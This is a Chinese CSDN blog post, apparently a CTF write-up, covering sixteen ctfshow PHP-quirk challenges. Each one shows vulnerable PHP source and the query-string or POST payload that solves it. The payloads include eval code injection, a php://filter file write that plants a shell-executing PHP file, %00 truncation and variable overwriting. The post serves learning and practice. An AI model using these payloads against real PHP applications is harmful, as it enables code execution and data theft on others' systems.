CTF php特性(上)

已于 2024-07-20 14:05:01 修改
阅读量645 收藏 15
点赞数 17
分类专栏: 网络安全 CTF 文章标签: php 开发语言 网络安全
于 2024-07-20 13:57:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81556781/article/details/140570404
版权

相关php代码性质的绕过与理解 以下代码出自于ctfshow

1.

include("flag.php"); 
highlight_file(__FILE__); 
if(isset($_GET['num'])){   
    $num = $_GET['num'];   
    if(preg_match("/[0-9]/", $num)){     
        die("no no no!");   
    }   
    if(intval($num)){     
        echo $flag;   
    } 
}

其中intval函数:获取整数值

不能出现0~9的数字,但是可以用空数组绕过 ?num[]=

2.

include("flag.php"); 
highlight_file(__FILE__); 
if(isset($_GET['num'])){   
    $num = $_GET['num'];   
    if($num==="4476"){     
        die("no no no!");   
    }   
    if(intval($num,0)===4476){     
        echo $flag;   
    }else{     
        echo intval($num,0);   
    } 
}

intval($var,$base)

var必填,base可选,这里base=0,则表示根据var开始的数字决定使用的进制

而===表示数值和类型必须相等

所以可以考虑4476的八进制或十六进制绕过 ?num=010574 or ?num=0x117c

3.

show_source(__FILE__); 
include('flag.php'); 
$a=$_GET['cmd']; 
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){     
        echo 'hacker';   
    }else{     
        echo $flag;   
    } 
}else{   
    echo 'nonononono'; 
}

结合代码可知 满足/^php$/im 且不满足 /^php$/i 才可以得到flag

'/im',这意味着i(忽略大小写)和m(多行模式)

所以可以多行去写这里就可以用到换行符了 %0a

?cmd = nb%0aphp

4.

include("flag.php"); 
highlight_file(__FILE__); 
if(isset($_GET['num'])){   
    $num = $_GET['num'];   
    if($num==4476){     
        die("no no no!");   
    }   
    if(intval($num,0)==4476){     
        echo $flag;   
    }else{     
        echo intval($num,0);   
    } 
}

同2. 进制绕过即可,题目写的是0即八进制,可以选择使用十六进制绕过

5.

include("flag.php"); 
highlight_file(__FILE__); 
if(isset($_GET['num'])){   
    $num = $_GET['num'];   
    if($num==4476){     
        die("no no no!");   
    }   
    if(preg_match("/[a-z]/i", $num)){     
        die("no no no!");   
    }   
    if(intval($num,0)==4476){     
        echo $flag;   
    }else{     
        echo intval($num,0);   
    } 
}

多加了字母过滤,可以直接八进制绕过

也可以使用小数绕过 ?num=4476.1 因为小数部分会被程序自动舍弃,所以无伤大雅完美绕过$num==4476的拦截

6.

include("flag.php"); 
highlight_file(__FILE__); 
if(isset($_GET['num'])){   
    $num = $_GET['num'];   
    if($num==="4476"){     
        die("no no no!");   
    }   
    if(preg_match("/[a-z]/i", $num)){     
        die("no no no!");   
    }   
    if(!strpos($num, "0")){     
        die("no no no!");   
    }   
    if(intval($num,0)===4476){     
        echo $flag;   
    } 
}

strpos(string,find,start)

string是被检查的字符串,find是要被搜索的字符串,start是开始检索的位置

题干加了!,说明是必须要有零的存在 所以直接?num=4476.0

7.

include("flag.php"); 
highlight_file(__FILE__); 
if(isset($_GET['num'])){   
    $num = $_GET['num'];   
    if($num==4476){     
        die("no no no!");   
    }   
    if(preg_match("/[a-z]|\./i", $num)){     
        die("no no no!!");   
    }   
    if(!strpos($num, "0")){     
        die("no no no!!!");   
    }   
    if(intval($num,0)===4476){    
        echo $flag; 
    }
}

多过滤了字母和小数点

所以不能小数绕过了,直接使用空格%20并且使用八进制绕过即可

?num=%20010574

8.

highlight_file(__FILE__);
if(isset($_GET['u'])){   
    if($_GET['u']=='flag.php'){  
        die("no no no");   
    }else{   
        highlight_file($_GET['u']);   
    } 
}

只要不是只输入flag.php即可

?u=./flag.php秒了

用之前的filter伪协议加base64编码也可以

9.

include("flag.php"); 
highlight_file(__FILE__); 
if (isset($_POST['a']) and isset($_POST['b'])) { 
    if ($_POST['a'] != $_POST['b']) 
        if (md5($_POST['a']) === md5($_POST['b'])) 
            echo $flag; 
    else 
        print 'Wrong.'; 
}

md5无法对数组加密,对数组加密返回的是null

所以使用POST请求 a[]=1&b[]=1

10.

include("flag.php"); 
$_GET?$_GET=&$_POST:'flag'; 
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag'; $_GET['flag']=='flag'?$_GET=&$_SERVER:'flag'; highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

说明要改两个地方 一个是cookie 一个是server

cookie增加 HTTP_FLAG=flag的值 满足cookie

url后缀随便玩 ?1

POST请求flag=flag 满足server

11.

highlight_file(__FILE__); 
include("ctfshow.php"); 
//flag in class ctfshow; 
$ctfshow = new ctfshow(); 
$v1=$_GET['v1']; 
$v2=$_GET['v2']; 
$v3=$_GET['v3']; 
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3); 
if($v0){   
    if(!preg_match("/\;/", $v2)){     
        if(preg_match("/\;/", $v3)){       
            eval("$v2('ctfshow')$v3");   
        }
    }
}

因为计算v0用的是和运算,所以只需要V1有数字即可

v2,v3可以不用提供数字

if语句中 v2不能有符号; v3可以有

eval函数 呈现拼接作用

/?v1=1&v2=print_r($ctfshow)/&v3=/; 注释即可

12.

highlight_file(__FILE__); 
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow(); 
$v1=$_GET['v1']; 
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3); 
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){       
            eval("$v2('ctfshow')$v3");  
        }
    }
}

v1仍然数字 v2,v3无碍

涉及到类 可以new ReflectionClass($class) 可以获得类的反射对象(包含元数据信息)

元数据对象(包含class的所有属性/方法的元数据信息)

?v1=1&v2=echo new ReflectionClass&v3=;

其中0x2d要替换成 -

而且还缺少最后一位,可以自己猜,也可以去爆破

13.

highlight_file(__FILE__); 
$v1 = $_POST['v1']; 
$v2 = $_GET['v2']; 
$v3 = $_GET['v3']; 
$v4 = is_numeric($v2) and is_numeric($v3); 
if($v4){   
    $s = substr($v2,2);   
    $str = call_user_func($v1,$s);   
    echo $str;   
    file_put_contents($v3,$str); 
} else{   
    die('hacker');
}

substr($str,start,length) (其中length可以省略) 字符串截取

call_user_func($obj,$data) 调用方法或变量,第一个参数是调用的对象,第二个参数是被调用对象的参数

file_put_contents($file,$data) 用来写文件进去,第一个参数是文件名,第二个参数是需要写进文件中的内容 文件名支持伪协议

所以主要是利用file_put_contents()函数创建文件,文件中注入攻击代码

v3=php://filter/write=convert.base64-decode/resource=1.php 用伪协议base64编码

然后通过v2(查看源码)写入1.php内容

  1. <?=cat *;

  2. 转为base64为PD89YGNhdCAqYDs

  3. 转为16进制的ascii码为5044383959474e6864434171594473

  4. 绕过截断,在前面随意加两位数字225044383959474e6864434171594473

v1=hex2bin 将数字字符串还原为base64码.(十六进制字符转二进制字符)

POST请求: v1=hex2bin

GET请求: v2=225044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

14.

highlight_file(__FILE__); 
include('flag.php'); 
error_reporting(0); 
$error='你还想要flag嘛?'; 
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){ 
    if($key==='error'){
        die("what are you doing?!");  
    }   
    $$key=$$value; 
}
foreach($_POST as $key => $value){  
    if($value==='flag'){   
        die("what are you doing?!");
    } 
    $$key=$$value;
} 
if(!($_POST['flag']==$flag)){  
    die($error); 
} 
echo "your are good".$flag."\n"; 
die($suces);

$$key = $$value可以类似于,将$key的地址指向$value

所以无论$b怎么改变值,$a的值都会和$b一样

die()函数虽然会终止程序,但同时也会输出括号内的终止提示信息

所以会通过$flag来替换$error,然后再die($error)来输出flag

先覆盖GET,再覆盖POST

GET请求 ?suces=flag

POST请求 error=suces

15.

highlight_file(__FILE__); 
error_reporting(0); 
include("flag.php"); 
if(isset($_POST['v1'])){   
    $v1 = $_POST['v1'];   
    $v3 = $_GET['v3'];    
    parse_str($v1,$v2);    
    if($v2['flag']==md5($v3)){      
        echo $flag;    
    } 
}

对于md5之前提到过 直接v3[]=1即可

parse_str($v1,$v2),则会将v1解析后,放到v2变量里面。

所以只要满足v2=md5的v3即可

POST请求v1=v2

GET请求?v3[]=1

16.

highlight_file(__FILE__); 
error_reporting(0); 
include("flag.php"); 
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE) {   
    die('error'); } 
//只有36d的人才能看到flag 
if(intval(strrev($_GET['c']))==0x36d){   
    echo $flag; 
}

ereg正则匹配,需要字母开头或结尾

strrev逆序倒置

0x36d为16进制数,十进制为877

需要字母开头或结尾

所以可以写为877a,因为是==弱比较,可以等同于877

逆序后为a778,直接读取不行,需要加一个截断%00,截断的意思就是读到%00就不读了

GET请求:?c=a%00778

2301_81556781
关注
专栏目录
网络安全 | CTF】攻防世界 simple_php 解题详析
等风来
05-21 5267
恒等比较运算符是一个严格比较,它不仅比较变量的值,还比较变量的数据类型和内存地址。当使用恒等比较运算符比较两个变量时,如果它们的值和数据类型都相等,则返回 true。比较运算符是一个松散比较,它只比较变量的值,而不考虑变量的数据类型。当比较两个变量时,如果它们的值相等,则返回 true。5.对于两个操作数都是字符串的情况,PHP会将两个字符串中的非数字字符删除,然后将剩余的数字字符串转换为相应的数字进行比较。如果变量b的值大于1234,则输出变量flag2的值。如果变量b是一个数字,则终止程序的执行。
ctf php侧漏,ctf中常见的PHP漏洞小结
weixin_39588252的博客
04-01 1449
ctf中常见的PHP漏洞小结在做ctf题的时候经常会遇到一些PHP代码审计的题目,这里将我遇到过的常见漏洞做一个小结。md5()漏洞PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。常见的payload有QNKCDZO24061070...
CTFshow web(php特性 105-108)
csjjjd的博客
02-04 1616
明白了这个那接下来就好办了,直接令suces=flag然后再在POST上传error=flag。因为只有36d身材的人才能看到flag(doge),吓得我差点去叫了学姐外援做题,哈哈哈哈哈哈。哈希函数主流绕过就一个,拿出数组绕过,只要保证后面的数字不一样就好了。函数搜索由指定的字符串作为由模式指定的字符串,如果发现模式则返回。包含由正则表达式中的括号组成的所有匹配表达式的数组。$suces='既然你想要那给你吧!这里我的一篇文章有相关知识点,这种。搜索对于字母字符是区分大小写的。
CTFshow web入门 php特性web89-130
potatojiang的博客
08-09 734
看代码我们直接用空数组绕过就行。
ctfshow php特性系列
xiaolong22333的博客
04-18 4658
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
ctfshow php特性
weixin_63231007的博客
05-30 1023
web93 $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]/i", $num)){ die("no no no!"); } if(intval($num,0)==4476){ echo $flag; }else{ echo intval($num,0); } 使用进制计算:
CTF技巧_Web——PHP特性_绕过ereg()
Ho1aAs‘s Blog
11-21 1516
文章目录一、简述二、PHP源码三、方法及原理 一、简述 int ereg(string pattern, string originalstring, [array regs])函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回t1,否则,则返回0,且搜索对大小写敏感 ereg()函数存在NULL截断漏洞,当传入的字符串包含%00时,只有%00前的字符串会传入函数并执行,而后半部分不会传入函数判断。因此可以使用%00截断,连接非法字符串,从而绕过函数 二、PHP源码 题目来源:ctf.show
CTF中的PHP特性函数(上)
Jinmindong
01-03 608
作为PHP特性总结的第一篇,介绍了一下最简单的特性函数以及绕过方法,后面还会给大家带来更多的PHP特性知识,希望大家能喜欢。
CTF中的PHP特性函数(下)
小王的储物间
01-04 814
本文到这就结束了,这篇文章讲了几个比较有趣而且有一些难度的特性知识,不知道大家吸收的咋样了,当然PHP特性远没有这么少,有兴趣的小伙伴可以自行去了解一下。喜欢本文的朋友希望可以一键三连支持一下。
2024年网络安全最新ctf中常见php特性_php特性 ctf
m0_54903333的博客
05-03 896
在这个例子中,如果攻击者将恶意的PHP代码作为评论提交,如,它会被存储到数据库,并在评论显示时执行。这种远程代码执行漏洞可能导致攻击者获得应用程序的控制权,执行任意的系统命令,访问敏感数据等。24. ## 六、PHP类型强制转换:通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。25. PHP类型强制转换是指通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。
CTF-PHP特性知识点总结
zji
07-16 788
系列文章目录 提示:来自CTFshow题目 文章目录系列文章目录来自ctfshow的所有题目总结一、intval()函数二、多行匹配3.== 弱类型与路径问题4.md5()5.三目运算符的理解+变量覆盖6. in_array()函数7.is_numeric()函数优先级 前置需要学习参考 php中=与区别 来自ctfshow的所有题目总结 一、intval()函数 例子1 例子1 if(preg_match("/[0-9]/", $num)){ die("no no no!");
Web攻防--PHP特性&CTF考点
weixin_68243135的博客
11-15 1218
Web攻防--PHP语言特性--函数缺陷
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
2401_84413757的博客
09-10 706
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
一码空传临时网盘PHP源码,支持提取码功能
爱酷码的博客
09-11 334
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 520
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 528
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1859
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 725
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
2019 ISCC CTF挑战:代码审计解密PHP脚本
这道题目属于代码审计类别,主要考察参赛者对PHP函数的理解和利用,特别是涉及到的缺陷或特性分析。挑战者需要访问靶机URL ,并解析给出的PHP脚本来获取flag。 题目中的关键代码首先会从`$_GET`参数中获取`value`和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值